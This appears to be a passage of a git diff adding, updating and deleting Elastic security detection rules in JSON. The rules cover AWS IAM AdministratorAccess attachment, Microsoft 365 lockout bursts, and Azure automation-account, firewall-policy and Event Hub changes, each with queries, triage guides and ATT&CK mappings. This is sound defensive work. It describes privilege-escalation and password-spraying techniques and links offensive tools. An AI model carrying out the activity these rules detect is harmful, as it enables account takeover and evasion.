`aws.cloudtrail.eventName:AssumeRole` with the target role ARN. \n- Search for other recent IAM policy attachments or modifications by the same actor or IP. \n\n**4. Recovery and hardening**\n- Apply least privilege policies; limit who can attach or modify administrative policies. \n- Enforce IAM Conditions such as `aws:PrincipalArn` or `aws:ResourceTag` to limit policy attachment scope. \n- Enable CloudTrail, GuardDuty, and Security Hub across all regions. \n- Implement SCPs at the organization level to restrict direct `AdministratorAccess` attachments. \n\n### Additional information\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/): response steps related to IAM policy modification and unauthorized privilege escalation.. \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/): for containment, analysis, and recovery guidance.\n- **AWS Documentation:** [AdministratorAccess Policy](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_job-functions.html#jf_administrator). \n", + "query": "iam where event.dataset == \"aws.cloudtrail\"\n and event.provider == \"iam.amazonaws.com\"\n and event.action == \"AttachRolePolicy\"\n and event.outcome == \"success\"\n and stringContains(aws.cloudtrail.request_parameters, \"policyArn=arn:aws:iam::aws:policy/AdministratorAccess\")\n", + "references": [ + "https://docs.aws.amazon.com/IAM/latest/APIReference/API_AttachRolePolicy.html", + "https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AdministratorAccess.html", + "https://hackingthe.cloud/aws/exploitation/iam_privilege_escalation/" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.request_parameters", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "dde13d58-bc39-4aa0-87fd-b4bdbf4591da", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS IAM", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.003", + "name": "Additional Cloud Roles", + "reference": "https://attack.mitre.org/techniques/T1098/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.003", + "name": "Additional Cloud Roles", + "reference": "https://attack.mitre.org/techniques/T1098/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "dde13d58-bc39-4aa0-87fd-b4bdbf4591da_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/de67f85e-2d43-11f0-b8c9-f661ea17fbcc_1.json b/packages/security_detection_engine/kibana/security_rule/de67f85e-2d43-11f0-b8c9-f661ea17fbcc_1.json deleted file mode 100644 index 00c111e88de..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/de67f85e-2d43-11f0-b8c9-f661ea17fbcc_1.json +++ /dev/null @@ -1,56 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects a burst of Microsoft 365 user account lockouts within a short 5-minute window. A high number of IdsLocked login errors across multiple user accounts may indicate brute-force attempts for the same users resulting in lockouts.", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Multiple Microsoft 365 User Account Lockouts in Short Time Window", - "note": "## Triage and Analysis\n\n### Investigating Multiple Microsoft 365 User Account Lockouts in Short Time Window\n\nDetects a burst of Microsoft 365 user account lockouts within a short 5-minute window. A high number of IdsLocked login errors across multiple user accounts may indicate brute-force attempts for the same users resulting in lockouts.\n\nThis rule uses ES|QL aggregations and thus has dynamically generated fields. Correlation of the values in the alert document may need to be performed to the original sign-in and Graph events for further context.\n\n### Investigation Steps\n\n- Review the `user_id_list`: Are specific naming patterns targeted (e.g., admin, helpdesk)?\n- Examine `ip_list` and `source_orgs`: Look for suspicious ISPs or hosting providers.\n- Check `duration_seconds`: A very short window with a high lockout rate often indicates automation.\n- Confirm lockout policy thresholds with IAM or Entra ID admins. Did the policy trigger correctly?\n- Use the `first_seen` and `last_seen` values to pivot into related authentication or audit logs.\n- Correlate with any recent detection of password spraying or credential stuffing activity.\n- Review the `request_type` field to identify which authentication methods were used (e.g., OAuth, SAML, etc.).\n- Check for any successful logins from the same IP or ASN after the lockouts.\n\n### False Positive Analysis\n\n- Automated systems with stale credentials may cause repeated failed logins.\n- Legitimate bulk provisioning or scripted tests could unintentionally cause account lockouts.\n- Red team exercises or penetration tests may resemble the same lockout pattern.\n- Some organizations may have a high volume of lockouts due to user behavior or legacy systems.\n\n### Response Recommendations\n\n- Notify affected users and confirm whether activity was expected or suspicious.\n- Lock or reset credentials for impacted accounts.\n- Block the source IP(s) or ASN temporarily using conditional access or firewall rules.\n- Strengthen lockout and retry delay policies if necessary.\n- Review the originating application(s) involved via `request_types`.\n", - "query": "FROM logs-o365.audit-*\n\n| MV_EXPAND event.category\n| EVAL\n time_window = DATE_TRUNC(5 minutes, @timestamp),\n user_id = TO_LOWER(o365.audit.UserId),\n ip = source.ip,\n login_error = o365.audit.LogonError,\n request_type = TO_LOWER(o365.audit.ExtendedProperties.RequestType),\n asn_org = source.`as`.organization.name,\n country = source.geo.country_name,\n event_time = @timestamp\n\n| WHERE event.dataset == \"o365.audit\"\n AND event.category == \"authentication\"\n AND event.provider IN (\"AzureActiveDirectory\", \"Exchange\")\n AND event.action IN (\"UserLoginFailed\", \"PasswordLogonInitialAuthUsingPassword\")\n AND request_type RLIKE \"(oauth.*||.*login.*)\"\n AND login_error == \"IdsLocked\"\n AND user_id != \"not available\"\n AND o365.audit.Target.Type IN (\"0\", \"2\", \"6\", \"10\")\n AND asn_org != \"MICROSOFT-CORP-MSN-AS-BLOCK\"\n\n| STATS\n unique_users = COUNT_DISTINCT(user_id),\n user_id_list = VALUES(user_id),\n ip_list = VALUES(ip),\n unique_ips = COUNT_DISTINCT(ip),\n source_orgs = VALUES(asn_org),\n countries = VALUES(country),\n unique_country_count = COUNT_DISTINCT(country),\n unique_asn_orgs = COUNT_DISTINCT(asn_org),\n request_types = VALUES(request_type),\n first_seen = MIN(event_time),\n last_seen = MAX(event_time),\n total_lockout_responses = COUNT()\n BY time_window\n\n| EVAL\n duration_seconds = DATE_DIFF(\"seconds\", first_seen, last_seen)\n\n| KEEP\n time_window, unique_users, user_id_list, ip_list,\n unique_ips, source_orgs, countries, unique_country_count,\n unique_asn_orgs, request_types, first_seen, last_seen,\n total_lockout_responses, duration_seconds\n\n| WHERE\n unique_users >= 10 AND\n total_lockout_responses >= 10 AND\n duration_seconds <= 300\n", - "references": [ - "https://learn.microsoft.com/en-us/security/operations/incident-response-playbook-password-spray", - "https://learn.microsoft.com/en-us/purview/audit-log-detailed-properties", - "https://securityscorecard.com/research/massive-botnet-targets-m365-with-stealthy-password-spraying-attacks/", - "https://github.com/0xZDH/Omnispray", - "https://github.com/0xZDH/o365spray" - ], - "risk_score": 47, - "rule_id": "de67f85e-2d43-11f0-b8c9-f661ea17fbcc", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Use Case: Threat Detection", - "Use Case: Identity and Access Audit", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 1 - }, - "id": "de67f85e-2d43-11f0-b8c9-f661ea17fbcc_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/de67f85e-2d43-11f0-b8c9-f661ea17fbcc_4.json b/packages/security_detection_engine/kibana/security_rule/de67f85e-2d43-11f0-b8c9-f661ea17fbcc_4.json index 8288c891ff8..3053988217d 100644 --- a/packages/security_detection_engine/kibana/security_rule/de67f85e-2d43-11f0-b8c9-f661ea17fbcc_4.json +++ b/packages/security_detection_engine/kibana/security_rule/de67f85e-2d43-11f0-b8c9-f661ea17fbcc_4.json @@ -18,6 +18,12 @@ "https://github.com/0xZDH/Omnispray", "https://github.com/0xZDH/o365spray" ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], "risk_score": 47, "rule_id": "de67f85e-2d43-11f0-b8c9-f661ea17fbcc", "severity": "medium", diff --git a/packages/security_detection_engine/kibana/security_rule/df26fd74-1baa-4479-b42e-48da84642330_103.json b/packages/security_detection_engine/kibana/security_rule/df26fd74-1baa-4479-b42e-48da84642330_103.json deleted file mode 100644 index e25780c619d..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/df26fd74-1baa-4479-b42e-48da84642330_103.json +++ /dev/null @@ -1,96 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when an Azure Automation account is created. Azure Automation accounts can be used to automate management tasks and orchestrate actions across systems. An adversary may create an Automation account in order to maintain persistence in their target's environment.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Automation Account Created", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Automation Account Created\n\nAzure Automation accounts facilitate the automation of management tasks and orchestration across cloud environments, enhancing operational efficiency. However, adversaries may exploit these accounts to establish persistence by automating malicious activities. The detection rule monitors the creation of these accounts by analyzing specific Azure activity logs, focusing on successful operations, to identify potential unauthorized or suspicious account creations.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to confirm the creation of the Automation account by checking for the operation name \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/WRITE\" and ensure the event outcome is marked as Success.\n- Identify the user or service principal that initiated the creation of the Automation account by examining the associated user identity information in the activity logs.\n- Investigate the context of the Automation account creation by reviewing recent activities performed by the identified user or service principal to determine if there are any other suspicious or unauthorized actions.\n- Check the configuration and permissions of the newly created Automation account to ensure it does not have excessive privileges that could be exploited for persistence or lateral movement.\n- Correlate the Automation account creation event with other security alerts or logs to identify any patterns or indicators of compromise that may suggest malicious intent.\n\n### False positive analysis\n\n- Routine administrative tasks may trigger the rule when legitimate users create Azure Automation accounts for operational purposes. To manage this, maintain a list of authorized personnel and their expected activities, and cross-reference alerts with this list.\n- Automated deployment scripts or infrastructure-as-code tools might create automation accounts as part of their normal operation. Identify these scripts and exclude their associated activities from triggering alerts by using specific identifiers or tags.\n- Scheduled maintenance or updates by cloud service providers could result in the creation of automation accounts. Verify the timing and context of the account creation against known maintenance schedules and exclude these from alerts if they match.\n- Development and testing environments often involve frequent creation and deletion of resources, including automation accounts. Implement separate monitoring rules or environments for these non-production areas to reduce noise in alerts.\n\n### Response and remediation\n\n- Immediately review the Azure activity logs to confirm the creation of the Automation account and identify the user or service principal responsible for the action.\n- Disable the newly created Azure Automation account to prevent any potential malicious automation tasks from executing.\n- Conduct a thorough investigation of the user or service principal that created the account to determine if their credentials have been compromised or if they have acted maliciously.\n- Reset credentials and enforce multi-factor authentication for the identified user or service principal to prevent unauthorized access.\n- Review and adjust Azure role-based access control (RBAC) policies to ensure that only authorized personnel have the ability to create Automation accounts.\n- Escalate the incident to the security operations team for further analysis and to determine if additional systems or accounts have been compromised.\n- Implement enhanced monitoring and alerting for future Automation account creations to quickly detect and respond to similar threats.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/WRITE\" and event.outcome:(Success or success)\n", - "references": [ - "https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor", - "https://github.com/hausec/PowerZure", - "https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a", - "https://azure.microsoft.com/en-in/blog/azure-automation-runbook-management/" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "df26fd74-1baa-4479-b42e-48da84642330", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "df26fd74-1baa-4479-b42e-48da84642330_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/df919b5e-a0f6-4fd8-8598-e3ce79299e3b_7.json b/packages/security_detection_engine/kibana/security_rule/df919b5e-a0f6-4fd8-8598-e3ce79299e3b_7.json new file mode 100644 index 00000000000..eb1ee38cc00 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/df919b5e-a0f6-4fd8-8598-e3ce79299e3b_7.json @@ -0,0 +1,141 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An adversary with access to a set of compromised credentials may attempt to persist or escalate privileges by attaching additional permissions to user groups the compromised user account belongs to. This rule looks for use of the IAM AttachGroupPolicy API operation to attach the highly permissive AdministratorAccess AWS managed policy to an existing IAM user group.", + "false_positives": [ + "While this can be normal behavior, it should be investigated to ensure validity. Verify whether the user identity should be using the IAM `AttachGroupPolicy` API operation to attach the `AdministratorAccess` policy to the user group." + ], + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "event.action", + "group.name", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters" + ] + }, + "language": "eql", + "license": "Elastic License v2", + "name": "AWS IAM AdministratorAccess Policy Attached to Group", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS IAM AdministratorAccess Policy Attached to Group\n\nThe AWS-managed `AdministratorAccess` policy grants full administrative privileges across all AWS services. \nWhen attached to a group, all group members inherit this access, often unintentionally broadening the blast radius of a compromise. \nAdversaries can exploit `iam:AttachGroupPolicy` permissions to escalate privileges or establish persistence by attaching this policy to an existing user group.\n\n#### Possible investigation steps\n\n- **Identify the affected group and calling principal.** \n Review `aws.cloudtrail.user_identity.arn` (caller) and `aws.cloudtrail.request_parameters.groupName` (target group). \n Validate whether this aligns with legitimate change management or automation workflows. \n\n- **Review group membership.** \n Enumerate current members using `aws iam get-group`. \n Determine whether unauthorized users could have gained administrative access as a result. \n\n- **Inspect CloudTrail details.** \n Check `source.ip`, `user_agent.original`, and `source.geo` fields for anomalies. \n Compare with historical operations by the same principal. \n\n- **Correlate related IAM activity.** \n Search for adjacent events such as `AddUserToGroup`, `CreateUser`, or `AttachUserPolicy`. \n These may indicate chained privilege escalation. \n\n- **Assess propagation of privileges.** \n If the group has many members or is linked to cross-account roles, the impact may extend beyond a single user. \n Document all affected identities for containment. \n\n### False positive analysis\n\n- **Intentional access updates.** \n Policy attachment may occur during legitimate administrative provisioning. Confirm via ticketing systems. \n- **Automation or compliance tasks.** \n Some environments use centralized scripts to attach AdministratorAccess temporarily. Validate through automation logs. \n\n### Response and remediation\n\n**1. Immediate containment**\n- Detach the policy from the affected group (`aws iam detach-group-policy`). \n- Review and limit group membership. Temporarily remove non-essential users or disable access for impacted accounts. \n- Rotate credentials for users who inherited admin privileges from the attachment. \n- Enable MFA on all impacted accounts. \n\n**2. Evidence preservation**\n- Export the triggering `AttachGroupPolicy` event and related CloudTrail entries \u00b130 minutes from the alert. \n- Preserve AWS Config and GuardDuty records to support forensic analysis. \n\n**3. Scoping and investigation**\n- Review additional IAM operations from the same caller (`CreateAccessKey`, `AttachRolePolicy`, `UpdateAssumeRolePolicy`). \n- Identify whether new groups or roles were created shortly before or after the event. \n- Check for subsequent API activity by newly privileged users (for example, S3, EC2, or IAM modifications). \n\n**4. Recovery and hardening**\n- Reinforce least privilege, avoid assigning `AdministratorAccess` to groups. \n- Use role-based access control with scoped permissions. \n- Enable CloudTrail, GuardDuty, and Security Hub across all regions. \n- Implement SCPs at the organization level to restrict direct `AdministratorAccess` attachments. \n\n### Additional information\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/): response steps related to IAM policy modification and unauthorized privilege escalation.. \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/): for containment, analysis, and recovery guidance.\n- **AWS Documentation:** [AdministratorAccess Policy](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_job-functions.html#jf_administrator).\n", + "query": "iam where event.dataset == \"aws.cloudtrail\"\n and event.provider == \"iam.amazonaws.com\"\n and event.action == \"AttachGroupPolicy\"\n and event.outcome == \"success\"\n and stringContains(aws.cloudtrail.request_parameters, \"policyArn=arn:aws:iam::aws:policy/AdministratorAccess\")\n", + "references": [ + "https://docs.aws.amazon.com/IAM/latest/APIReference/API_AttachGroupPolicy.html", + "https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AdministratorAccess.html", + "https://hackingthe.cloud/aws/exploitation/iam_privilege_escalation/" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.request_parameters", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "df919b5e-a0f6-4fd8-8598-e3ce79299e3b", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS IAM", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.003", + "name": "Additional Cloud Roles", + "reference": "https://attack.mitre.org/techniques/T1098/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.003", + "name": "Additional Cloud Roles", + "reference": "https://attack.mitre.org/techniques/T1098/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "df919b5e-a0f6-4fd8-8598-e3ce79299e3b_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e02bd3ea-72c6-4181-ac2b-0f83d17ad969_103.json b/packages/security_detection_engine/kibana/security_rule/e02bd3ea-72c6-4181-ac2b-0f83d17ad969_103.json deleted file mode 100644 index 1db32d5855b..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/e02bd3ea-72c6-4181-ac2b-0f83d17ad969_103.json +++ /dev/null @@ -1,88 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the deletion of a firewall policy in Azure. An adversary may delete a firewall policy in an attempt to evade defenses and/or to eliminate barriers to their objective.", - "false_positives": [ - "Firewall policy deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Firewall policy deletions by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Firewall Policy Deletion", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Firewall Policy Deletion\n\nAzure Firewall policies are crucial for managing and enforcing network security rules across Azure environments. Adversaries may target these policies to disable security measures, facilitating unauthorized access or data exfiltration. The detection rule monitors Azure activity logs for successful deletion operations of firewall policies, signaling potential defense evasion attempts by identifying specific operation names and outcomes.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to confirm the deletion event by filtering for the operation name \"MICROSOFT.NETWORK/FIREWALLPOLICIES/DELETE\" and ensuring the event outcome is \"Success\".\n- Identify the user or service principal responsible for the deletion by examining the 'caller' field in the activity logs.\n- Check the timestamp of the deletion event to determine when the policy was deleted and correlate it with other security events or alerts around the same time.\n- Investigate the context of the deletion by reviewing any related activities performed by the same user or service principal, such as modifications to other security settings or unusual login patterns.\n- Assess the impact of the deletion by identifying which resources or networks were protected by the deleted firewall policy and evaluating the potential exposure or risk introduced by its removal.\n- Contact the responsible user or team to verify if the deletion was authorized and part of a planned change or if it was unexpected and potentially malicious.\n\n### False positive analysis\n\n- Routine maintenance or updates by authorized personnel can trigger the deletion event. Ensure that such activities are logged and verified by cross-referencing with change management records.\n- Automated scripts or tools used for infrastructure management might delete and recreate firewall policies as part of their operation. Identify these scripts and exclude their activity from alerts by using specific identifiers or tags.\n- Test environments often undergo frequent changes, including policy deletions. Consider excluding activity from known test environments by filtering based on resource group or subscription IDs.\n- Scheduled policy updates or rotations might involve temporary deletions. Document these schedules and adjust monitoring rules to account for these expected changes.\n- Ensure that any third-party integrations or services with permissions to modify firewall policies are accounted for, and their actions are reviewed and whitelisted if necessary.\n\n### Response and remediation\n\n- Immediately isolate the affected Azure resources to prevent further unauthorized access or data exfiltration. This can be done by applying restrictive network security group (NSG) rules or using Azure Security Center to quarantine resources.\n- Review Azure activity logs to identify the user or service principal responsible for the deletion. Verify if the action was authorized and investigate any suspicious accounts or credentials.\n- Restore the deleted firewall policy from backups or recreate it using predefined templates to ensure that network security rules are reinstated promptly.\n- Implement conditional access policies to enforce multi-factor authentication (MFA) for all users with permissions to modify or delete firewall policies, reducing the risk of unauthorized changes.\n- Escalate the incident to the security operations team for further investigation and to determine if additional resources or systems have been compromised.\n- Conduct a post-incident review to identify gaps in security controls and update incident response plans to address similar threats in the future.\n- Enhance monitoring by configuring alerts for any future attempts to delete or modify critical security policies, ensuring rapid detection and response to potential threats.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.NETWORK/FIREWALLPOLICIES/DELETE\" and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/firewall-manager/policy-overview" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "e02bd3ea-72c6-4181-ac2b-0f83d17ad969", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Network Security Monitoring", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "e02bd3ea-72c6-4181-ac2b-0f83d17ad969_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e0f36de1-0342-453d-95a9-a068b257b053_103.json b/packages/security_detection_engine/kibana/security_rule/e0f36de1-0342-453d-95a9-a068b257b053_103.json deleted file mode 100644 index 27161d64393..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/e0f36de1-0342-453d-95a9-a068b257b053_103.json +++ /dev/null @@ -1,90 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies an Event Hub deletion in Azure. An Event Hub is an event processing service that ingests and processes large volumes of events and data. An adversary may delete an Event Hub in an attempt to evade detection.", - "false_positives": [ - "Event Hub deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Event Hub deletions by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Event Hub Deletion", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Event Hub Deletion\n\nAzure Event Hub is a scalable data streaming platform and event ingestion service, crucial for processing large volumes of data in real-time. Adversaries may target Event Hubs to delete them, aiming to disrupt data flow and evade detection by erasing evidence of their activities. The detection rule monitors Azure activity logs for successful deletion operations, flagging potential defense evasion attempts by identifying unauthorized or suspicious deletions.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to confirm the deletion event by checking the operation name \"MICROSOFT.EVENTHUB/NAMESPACES/EVENTHUBS/DELETE\" and ensure the event outcome is marked as Success.\n- Identify the user or service principal responsible for the deletion by examining the associated user identity or service principal ID in the activity logs.\n- Investigate the context of the deletion by reviewing recent activities performed by the identified user or service principal to determine if there are any other suspicious actions.\n- Check for any recent changes in permissions or roles assigned to the user or service principal to assess if the deletion was authorized or if there was a potential privilege escalation.\n- Correlate the deletion event with other security alerts or incidents in the environment to identify if this action is part of a larger attack pattern or campaign.\n- Communicate with relevant stakeholders or teams to verify if the deletion was part of a planned operation or maintenance activity.\n\n### False positive analysis\n\n- Routine maintenance or updates by authorized personnel can trigger deletion logs. Verify if the deletion aligns with scheduled maintenance activities and exclude these operations from alerts.\n- Automated scripts or tools used for managing Azure resources might delete Event Hubs as part of their normal operation. Identify these scripts and whitelist their activity to prevent false positives.\n- Test environments often involve frequent creation and deletion of resources, including Event Hubs. Exclude known test environments from monitoring to reduce noise.\n- Changes in organizational policies or restructuring might lead to legitimate deletions. Ensure that such policy-driven deletions are documented and excluded from alerts.\n- Misconfigured automation or deployment processes can inadvertently delete Event Hubs. Regularly review and update configurations to ensure they align with intended operations and exclude these from alerts if verified as non-threatening.\n\n### Response and remediation\n\n- Immediately isolate the affected Azure Event Hub namespace to prevent further unauthorized deletions or modifications. This can be done by restricting access through Azure Role-Based Access Control (RBAC) and network security groups.\n- Review and revoke any suspicious or unauthorized access permissions associated with the deleted Event Hub. Ensure that only authorized personnel have the necessary permissions to manage Event Hubs.\n- Restore the deleted Event Hub from backups if available, or reconfigure it to resume normal operations. Verify the integrity and completeness of the restored data.\n- Conduct a thorough audit of recent Azure activity logs to identify any other unauthorized actions or anomalies that may indicate further compromise.\n- Escalate the incident to the security operations team for a detailed investigation into the root cause and to assess the potential impact on other Azure resources.\n- Implement additional monitoring and alerting for Azure Event Hub operations to detect and respond to similar unauthorized activities 